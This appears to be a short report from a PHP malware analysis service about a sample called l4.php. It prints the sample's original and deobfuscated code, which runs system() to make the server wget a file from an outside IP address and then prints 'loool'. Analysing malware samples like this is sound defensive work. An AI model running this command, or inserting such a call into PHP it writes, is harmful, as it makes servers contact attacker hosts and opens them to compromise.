PHP Malware Analysis

l4.php

md5: ed85a27e6398a4634903be3f076de9b4

Jump to:

Screenshot

No Image

Attributes

Execution

URLs


Deobfuscated PHP code

<?php

system("wget http://23.88.39.86/ihavebeenpwned");
echo "loool";

Execution traces


Generated HTML code


Original PHP code

<?php
system("wget http://23.88.39.86/ihavebeenpwned");
echo "loool";
?>